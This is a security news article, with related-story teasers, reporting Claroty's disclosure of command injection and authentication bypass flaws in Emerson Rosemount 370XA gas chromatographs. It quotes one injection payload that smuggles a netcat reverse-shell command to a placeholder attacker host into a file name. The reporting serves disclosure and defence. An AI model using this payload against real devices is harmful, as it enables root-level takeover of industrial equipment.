Multiple Vulnerabilities Found in Gas Chromatographs

Multiple critical vulnerabilities in Emerson gas chromatographs could allow malicious actors access to sensitive data, cause denial-of-service conditions and execute arbitrary commands.
Gas chromatographs, used to analyze and separate chemical compounds, are integral tools in several industries, including the chemical, environmental and healthcare sectors.
The Emerson Rosemount 370XA, a widely used model, relies on a proprietary protocol for communication between the device and the technician's computer.
Security researchers at operational technology security firm Claroty's Team82 identified four key vulnerabilities: two command injection flaws, an authentication bypass and an authorization vulnerability.
One command injection flaw received a CVSS v3 score of 9.8, indicating its critical severity.
The vulnerability is linked to a system function that is called with a constructed shell command and includes a user-provided file name, without proper sanitization.
This enables an attacker to inject arbitrary shell commands.
The attacker can exploit this by supplying a crafted input such as gunzip -c ;nc -e /bin/sh ATTACKER MACHINE 1337;> name of the expanded file, which results in arbitrary code execution in the context of the root shell.
Another vulnerability, tracked as CVE-2023-51761, is an authentication bypass vulnerability that allows an attacker to bypass authentication by calculating a secret passphrase to reset the administrator password.
The passphrase is derived from the device's MAC address, which is not secret information and can be easily obtained.
The vulnerability tracked as CVE-2023-49716 is a user login bypass via a password reset mechanism.
This vulnerability enables an unauthenticated user with network access to bypass authentication and acquire admin capabilities.
The last vulnerability addressed is tracked as CVE-2023-43609 and is a command injection via reboot functionality.
This flaw allows an authenticated user with network access to run arbitrary commands from a remote computer.
Because of the high cost and difficulty of obtaining a physical device, the researchers emulated the Emerson Rosemount 370XA for their analysis.
They identified flaws in the device's protocol implementation, allowing them to craft payloads and uncover the vulnerabilities.
The authentication bypass vulnerability enabled attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.
Emerson in a security advisory recommended that end users update the firmware on the products.
The Cybersecurity and Infrastructure Security Agency has also released an advisory concerning the flaws.
Covering topics in risk management, compliance, fraud, and information security.


This Cyber News was published on www.bankinfosecurity.com. Publication date: Mon, 01 Jul 2024 12:43:04 +0000


Cyber News related to Multiple Vulnerabilities Found in Gas Chromatographs

Mideast Oil & Gas Facilities Could Face Cyber-Related Energy Disruptions - Middle East oil and gas operators will need to be vigilant about the risk of cyberattacks as the Israel-Gaza conflict continues, security experts warn, or else risk energy supply disruption globally. A recent report by S&P Global Ratings found that ...
1 year ago Darkreading.com
Multiple Vulnerabilities Found in Gas Chromatographs - Multiple critical vulnerabilities in Emerson gas chromatographs could allow malicious actors access to sensitive data, cause denial-of-service conditions and execute arbitrary commands. Gas chromatographs, used to analyze and separate chemical ...
9 months ago Bankinfosecurity.com CVE-2023-51761 CVE-2023-49716 CVE-2023-43609
CVE-2022-36025 - Besu is a Java-based Ethereum client. In versions newer than 22.1.3 and prior to 22.7.1, Besu is subject to an Incorrect Conversion between Numeric Types. An error in 32 bit signed and unsigned types in the calculation of available gas in the CALL ...
2 years ago
It was other crims what did it: SBF off hook for FTX hack The Register - Infosec In Brief The recent indictment of a massive SIM-swapping ring may mean convicted crypto conman Sam Bankman-Fried is innocent of at least one allegation still hanging over his head: The theft of more than $400 million in crypto hacked from ...
1 year ago Go.theregister.com CVE-2024-21917 CVE-2023-3346 CVE-2024-21916 CVE-2023-6246
CVE-2020-3273 - A vulnerability in the 802.11 Generic Advertisement Service (GAS) frame processing function of Cisco Wireless LAN Controller (WLC) Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial ...
4 years ago
A Suspected Cyberattack Paralyzes the Majority of Gas Stations Across Iran - Nearly 70% of Iran's gas stations went out of service on Monday following possible sabotage - a reference to cyberattacks, Iranian state TV reported. It urged people not to rush to the stations that were still operational. State TV quoted a statement ...
1 year ago Securityweek.com
CISA adds Check Point Quantum Security Gateways and Linux Kernel flaws to its Known Exploited Vulnerabilities catalog - CISA adds Apache Flink flaw to its Known Exploited Vulnerabilities catalog. CISA adds D-Link DIR router flaws to its Known Exploited Vulnerabilities catalog. CISA adds Google Chrome zero-days to its Known Exploited Vulnerabilities catalog. CISA adds ...
10 months ago Securityaffairs.com
Misconfiguration and vulnerabilities biggest risks in cloud security: Report - The two biggest cloud security risks continue to be misconfigurations and vulnerabilities, which are being introduced in greater numbers through software supply chains, according to a report by Sysdig. While zero trust is a top priority, data showed ...
2 years ago Csoonline.com Hunters
Strobes 2023 Pentesting Recap: Trends, Stats, and How PTaaS is Transforming Cybersecurity - This article covers some amazing statistics on what category of vulnerabilities we commonly report across 100s of customers, and how we reduce compliance times and turn around time to reporting critical vulnerabilities. In a different article, we ...
1 year ago Securityboulevard.com
Why CVEs Are an Incentives Problem - I've been thinking about some of these unintended consequences in the context of a growing problem faced by all of us in cybersecurity: how a fast-rising tide of software vulnerabilities tracked as common vulnerabilities and exposures - are reported ...
10 months ago Darkreading.com
Pro-Israeli Hacktivists Attack Iranian Gas Stations - Hacktivist group Predatory Sparrow says it was behind a cyberattack on gas stations across Iran that disrupted operations. Between 60% and 70% of Iranian gas stations reportedly have been affected. Reza Navar, a spokesperson for Iran's petrol ...
1 year ago Darkreading.com
Hacktivists say they shut down Iran's gasoline pumps The Register - Hacktivists reportedly disrupted services at about 70 percent of Iran's gas stations in a politically motivated cyberattack. Iran's oil minister Javad Owji confirmed on Monday the IT systems of the nation's petrol stations had been attacked as ...
1 year ago Go.theregister.com
Hacktivists say they shut down Iran's gasoline pumps The Register - Hacktivists reportedly disrupted services at about 70 percent of Iran's gas stations in a politically motivated cyberattack. Iran's oil minister Javad Owji confirmed on Monday the IT systems of the nation's petrol stations had been attacked as ...
1 year ago Packetstormsecurity.com
Industrials at Cisco Live 2024 - Network with thought leaders and gain forward-thinking insights driving your sector forward. Get started with a full list of industry sessions and activities. Join the leading minds in IT and learn about cutting-edge practices driving innovation in ...
10 months ago Feedpress.me
Microsoft Patch Tuesday 2024: 49 Vulnerabilities are fixed - Microsoft released its first patch on Tuesday, 2024, in which nearly 49 vulnerabilities have been fixed in Microsoft products and 5 vulnerabilities in non-Microsoft products. Among these 49 vulnerabilities, there were 12 remote code execution ...
1 year ago Cybersecuritynews.com CVE-2024-20674 CVE-2024-20700 CVE-2024-0057
Creating a formula for effective vulnerability prioritization - In this Help Net Security interview, Michael Gorelik, CTO and Head of Malware Research at Morphisec, provides insights into the business impact of vulnerabilities. Gorelik discusses challenges posed by regulatory frameworks, incomplete asset ...
1 year ago Helpnetsecurity.com
ChatGPT 4 can exploit 87% of one-day vulnerabilities - Since the widespread and growing use of ChatGPT and other large language models in recent years, cybersecurity has been a top concern. ChatGPT 4 quickly exploited one-day vulnerabilities. During the study, the team used 15 one-day vulnerabilities ...
9 months ago Securityintelligence.com
DrayTek Routers at Risk From 14 New Vulnerabilities - The advice comes amid signs of growing threat actor activity — including by nation-state actors — targeting vulnerabilities in routers and other network devices from DrayTek and a variety of other vendors, including Fortinet, F5, QNAP, Ivanti, ...
6 months ago Darkreading.com CVE-2024-41592 CVE-2024-41585 CVE-2021-20123 CVE-2021-20124
Out-of-bounds reads in Adobe Acrobat; Foxit PDF Reader contains vulnerability that could lead to SYSTEM-level privileges - Cisco Talos' Vulnerability Research team has helped to disclose and patch more than 20 vulnerabilities over the past three weeks, including two in the popular Adobe Acrobat Reader software. Acrobat, one of the most popular PDF readers currently ...
10 months ago Blog.talosintelligence.com
The many ways electric cars are vulnerable to hacks, and whether that matters in a real-world - While I don't own a Tesla, I am now more invested in following the various ways attackers can take advantage of the connectivity of electric cars. They're all Wi-Fi connected so drivers can control the charging speed and timing of their cars, monitor ...
1 year ago Blog.talosintelligence.com Volt Typhoon
ICS Patch Tuesday: Siemens Ruggedcom Devices Impacted by 45 Fortinet Vulnerabilities - Siemens and Schneider Electric have published their March 2024 Patch Tuesday security advisories, which cover more than 200 vulnerabilities affecting their products. Siemens has published 11 new advisories describing a total of 214 vulnerabilities. A ...
1 year ago Securityweek.com CVE-2024-21762 CVE-2023-27997 CVE-2022-41328
Iranian 'Seedworm' Cyber Spies Target African Telcos & ISPs - An Iran-backed cyberespionage group is actively targeting telcos in North and East Africa. According to security researchers at Symantec, the latest cyberattacks by the advanced persistent threat it calls Seedworm are targeting ...
1 year ago Darkreading.com
Exclusive: Ukraine says joint mission with US derailed Moscow's cyberattacks - On a Wednesday afternoon in late September, the head of the cyber division of Ukraine's intelligence service, Illia Vitiuk, sat down to discuss something that Ukraine had previously kept close to the vest - specifically how much a joint hunt forward ...
1 year ago Therecord.media
Microsoft Mitigates Three Vulnerabilities in Azure HDInsight - Microsoft recently remediated one Denial of Service and two Escalation of Privilege vulnerabilities affecting third party components of Azure HDInsight. The Microsoft Security Response Center continually works with security researchers who discover ...
1 year ago Msrc.microsoft.com
Microsoft's January 2024 Patch Tuesday Addresses 49 Vulnerabilities, Including Two Critical Vulnerabilities - Microsoft's first Patch Tuesday of 2024 has arrived, and it's a significant one. The tech giant has released fixes for a total of 49 vulnerabilities, including 12 remote code execution vulnerabilities and two critical vulnerabilities. These ...
1 year ago Securityboulevard.com

Cyber Trends (last 7 days)


Trending Cyber News (last 7 days)